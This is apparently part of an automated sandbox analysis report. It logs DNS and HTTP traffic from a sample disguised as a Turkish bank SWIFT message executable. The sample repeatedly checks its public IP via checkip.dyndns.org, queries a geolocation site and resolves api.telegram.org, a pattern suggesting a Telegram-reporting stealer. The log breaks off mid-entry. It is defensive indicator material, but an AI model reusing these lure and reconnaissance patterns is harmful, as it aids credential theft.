                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 12, 2024 21:38:35.964232922 CET192.168.2.51.1.1.10xe210Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:38.027304888 CET192.168.2.51.1.1.10x7adfStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:45.847441912 CET192.168.2.51.1.1.10x4d38Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:41:14.409028053 CET192.168.2.51.1.1.10xd7faStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 12, 2024 21:38:36.101943016 CET1.1.1.1192.168.2.50xe210No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.101943016 CET1.1.1.1192.168.2.50xe210No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.101943016 CET1.1.1.1192.168.2.50xe210No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.101943016 CET1.1.1.1192.168.2.50xe210No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.101943016 CET1.1.1.1192.168.2.50xe210No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:36.101943016 CET1.1.1.1192.168.2.50xe210No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:38.367252111 CET1.1.1.1192.168.2.50x7adfNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:38.367252111 CET1.1.1.1192.168.2.50x7adfNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:45.985619068 CET1.1.1.1192.168.2.50x4d38No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:48.696842909 CET1.1.1.1192.168.2.50x42efNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:38:48.696842909 CET1.1.1.1192.168.2.50x42efNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:41:14.658988953 CET1.1.1.1192.168.2.50xd7faNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:41:34.226413965 CET1.1.1.1192.168.2.50xfd44No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:41:34.226413965 CET1.1.1.1192.168.2.50xfd44No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:42:28.414310932 CET1.1.1.1192.168.2.50x727fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 12, 2024 21:42:28.414310932 CET1.1.1.1192.168.2.50x727fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:42:28.414310932 CET1.1.1.1192.168.2.50x727fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:42:28.414310932 CET1.1.1.1192.168.2.50x727fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:42:28.414310932 CET1.1.1.1192.168.2.50x727fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 21:42:28.414310932 CET1.1.1.1192.168.2.50x727fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.22A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • reallyfreegeoip.org
                                                                        • api.telegram.org
                                                                        • checkip.dyndns.org

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549707193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:38:36.228769064 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:38:37.550295115 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:37 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: c68aa34ab27e38c54844b7e4cc3fcd3e
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                        Dec 12, 2024 21:38:37.554390907 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Dec 12, 2024 21:38:38.025604010 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:37 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 9629221eabe6b741a8d3b6459c010b27
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                        Dec 12, 2024 21:38:45.432900906 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Dec 12, 2024 21:38:45.842670918 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:45 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: f654276cca628d0ef8b29cc11737806c
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549712193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:38:48.475776911 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Dec 12, 2024 21:38:49.754672050 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:49 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 92a560a7d1b84fa300f4a3da170de939
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549724193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:38:52.998987913 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:38:54.272154093 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 2a047bc101ea3cfeaddc84dc9c625e91
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549737193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:38:57.627815962 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:38:58.893512964 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:58 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 0d1bc54b042a67d05ea99189f86e5ddf
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549749193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:02.108619928 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:03.375794888 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:03 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d29851f9c84addd820a2ee0b0ba71f90
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.549761193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:06.669255018 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:07.937709093 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:07 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: e76f6e64476e2f60efa31a4c4d1e1fd2
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549773193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:11.247581005 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:12.515166044 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:12 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 68272b5b741b30b3b2bdc76143cc56da
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.549785193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:15.877429008 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:17.144881010 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 7319ec0fc7161b767b2a09293cdc3220
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.549796193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:20.420048952 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:21.695813894 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 9c1d1ff02a1a5facf284a54bb4bb81ca
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549809193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:24.975470066 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:26.254194021 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 1d7cd518da85b18bdd50a85fb81a03e6
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549824193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:29.865500927 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:31.202078104 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:31 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 2ca92aa2492aead898380b5a37818cd1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549837193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:35.078500032 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:36.436031103 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:36 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 618234a0b3ddeeda53dbad3281875f48
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549849193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:39.637399912 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:40.934254885 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:40 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: abcf7e3e5014a2155f849af62d306fbc
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.549861193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:44.186383009 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:45.500380039 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:45 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: e25177de2e4b53f2a12527baf81d7aa2
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.549873193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:48.736116886 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:50.005392075 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:49 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: de565a5177f68c5c634dfa9e8936b306
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.549885193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
